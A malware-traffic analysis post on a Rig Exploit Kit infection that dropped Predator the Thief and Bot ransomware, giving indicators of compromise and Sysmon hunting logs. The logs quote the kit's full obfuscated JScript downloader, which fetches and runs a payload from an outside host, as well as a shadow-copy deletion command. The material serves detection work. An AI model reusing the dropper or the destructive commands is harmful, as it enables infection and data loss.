Rig Exploit Kit delivers Predator the Thief and Bot Ransomware

Predator the Thief steals passwords from browser and cryptocurrency wallets from infected hosts. A good analysis can be found at Fortinet.com.

Bot ransomware has been linked to Dharma ransomware by many researchers. In this infection the host files were encrypted and renamed with the file extension [admin@sectex.net].bot. Link to first reported siting of Bot Ransomware can be found at www.bleepingcomputer.com.

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2019-11-19-RigEK-pcap.zip

 

ASSOCIATED DOMAINS:

209.126.103.139 – ticketskings.net – Redirect to RigEK
3.226.8.132 – usa.lupus-bra.com – Redirect to RigEK
94.130.90.228 – atztds25.world GET /vsrgq4gse43t4tw – Redirect Gate to RigEK
188.225.83.250 – Rig Exploit Kit
212.73.150.115 – POST /api/gate.get – Predator the Thief C2
45.147.229.149 – nadvexmail19mn.xyz GET /socks111atx.exe – Payload Delivery
192.64.119.112 – blogserv27.com POST /blogpics17/ – Payload Delivery
45.147.229.149 – nadvexmail19mn.xyz GET /socks.dll – Payload Delivery
185.222.202.235 – blogserv279.club POST /blogpics17/ – Payload Delivery

ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[Sysmon Event 1] – RigEK exploiting Iexplorer
Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d “%%tmp%%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“”+”WScr”+”ipt”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz” “ยค”
CurrentDirectory C:\Users\Rick\Desktop\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:3996 CREDAT:144385 /prefetch:2

[Sysmon Event 1] – Wscript calling for payload after exploit
Image C:\Windows\System32\wscript.exe
CommandLine wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine CMd.exe /q /c cd /d “%tmp%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“”+”WScr”+”ipt”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz”

[Sysmon Event 3] – Iexplorer communicating with RigEK
Image C:\Program Files\Internet Explorer\iexplore.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 188.225.83.250
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 3] – Wscript communicating with RigEK
Image C:\Windows\System32\wscript.exe
User Rick-PC\Rick
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 188.225.83.250
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1] – Original payload process creation
Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\System32\cmd.exe” /c radD8D54.tmp.exe
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Windows\System32\wscript.exe
ParentCommandLine wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz”

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
CommandLine radD8D54.tmp.exe
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=782BCE7A2A5A083B7E9BDE6D4DAAE492,SHA256=A8BF9EF68C8DA8EB556A764FA55C07B63066236541C0392C9D13F0BE7E712539
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c radD8D54.tmp.exe

[Sysmon Event 3] – Predator the Thief communicating with C2
Image C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 212.73.150.115
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Roaming\socks111atx.exe
CommandLine “C:\Users\Rick\AppData\Roaming\socks111atx.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=0E8A8ED0A6F9BD7120A3CFF4318EAB10,SHA256=0AE80985C40C6FFAF999AE12B9856264386C365749141DDC67219766DEE77351
ParentImage C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
ParentCommandLine radD8D54.tmp.exe

[Sysmon Event 1]
Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 && del “C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
ParentCommandLine radD8D54.tmp.exe

[Sysmon Event 1]
Image C:\Windows\System32\PING.EXE
CommandLine ping 127.0.0.1
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=6242E3D67787CCBF4E06AD2982853144,SHA256=4CA10DBA7FF487FDB3F1362A3681D7D929F5AA1262CDFD31B04C30826983FB1D
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 && del “C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe”

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
SourceIp 192.168.137.111
DestinationIp 45.147.229.149
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Roaming\socks111atx.exe
CommandLine “C:\Users\Rick\AppData\Roaming\socks111atx.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=0E8A8ED0A6F9BD7120A3CFF4318EAB10,SHA256=0AE80985C40C6FFAF999AE12B9856264386C365749141DDC67219766DEE77351
ParentImage C:\Users\Rick\AppData\Roaming\socks111atx.exe
ParentCommandLine “C:\Users\Rick\AppData\Roaming\socks111atx.exe”

[Sysmon Event 1]
Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 && del “C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe
ParentCommandLine radFB737.tmp.exe

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 212.73.150.115
DestinationHostname v73659.vps-ag.com
DestinationPort 80
DestinationPortName http

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 45.147.229.149
DestinationHostname
DestinationPort 80
DestinationPortName http

[Event 2]
Image C:\Windows\Explorer.EXE
TargetFilename C:\Users\Rick\AppData\Roaming\wbttadv

[Sysmon Event 1] – Regsvr32.exe executing malicious dll
Image C:\Windows\System32\regsvr32.exe
CommandLine regsvr32 /s C:\Users\Rick\AppData\Local\Temp\CD2D.tmp.dll
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

[Sysmon Event 1] – Regsvr32.exe executing malicious dll
Image C:\Windows\System32\regsvr32.exe
CommandLine regsvr32 /s C:\Users\Rick\AppData\Local\Temp\D5F4.tmp.dll
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Local\Temp\E5FC.tmp.exe
CommandLine C:\Users\Rick\AppData\Local\Temp\E5FC.tmp.exe
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=F2F689224DB1A035D7CEFFEB3E4B9C79,SHA256=6DFDD8CC3708DD08D4F92872C9415EA223DE03434C849D0A8CF795BA6E0482D5
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

[Sysmon Event 1] – Mode.com process creation associated with ransomware
Image C:\Windows\System32\mode.com
CommandLine mode con cp select=1251
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=F015208F1F8473BA2E4BC229E0D38EFD,SHA256=EFC11F8FCDD0A8649EBEE758B105DB10536E895EA6D586A07B61F68B1E5DBD20
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\system32\cmd.exe”

[Sysmon Event 1] – Vssadmin deleting shadow copies during ransomware infection
Image C:\Windows\System32\vssadmin.exe
CommandLine vssadmin delete shadows /all /quiet
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=6E248A3D528EDE43994457CF417BD665,SHA256=E09BF4D27555EC7567A598BA89CCC33667252CEF1FB0B604315EA7562D18AD10
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\system32\cmd.exe”

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\A0.tmp.exe
SourceIp 192.168.137.111
DestinationIp 212.73.150.115
DestinationHostname v73659.vps-ag.com
DestinationPort 80
DestinationPortName http

[Sysmon Event 1] – Mshta.exe creating ransomware message screen after files encrypted
Image C:\Windows\System32\mshta.exe
CommandLine “C:\Windows\System32\mshta.exe” “C:\Users\Rick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
Hashes MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820
ParentImage C:\Users\Rick\AppData\Local\Temp\EF9E.tmp.exe
ParentCommandLine “C:\Users\Rick\AppData\Local\Temp\EF9E.tmp.exe” -a

[Sysmon Event 1] – Notepad.exe creating ransom note after files encrypted
Image C:\Windows\System32\notepad.exe
CommandLine “C:\Windows\system32\NOTEPAD.EXE” C:\Users\Rick\Desktop\FILES ENCRYPTED.txt
CurrentDirectory C:\Users\Rick\Desktop\
Hashes MD5=D378BFFB70923139D6A4F546864AA61C,SHA256=C4232DDD4D37B9C0884BD44D8476578C54D7F98D58945728E425736A6A07E102
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

 

IMAGES AND DETAILS:


Shown above: Ransom note associated with infection [Info.hta]

 


Shown above: Some of the network traffic leading to and associated with infection

 


Shown above: One of the redirects using gzip compression its redirect

 


Shown above: Extracted and uncompressed gzip using Wiresharks ‘Export Objects’

 


Shown above: Predator the Thief POST’ing stolen broswer credentials to a ZIP file on its Command and Control (C2)

 

MALICIOUS PAYLOAD ASSOCIATED WITH RIG EK:
File hashes provided with Symon process creation logs.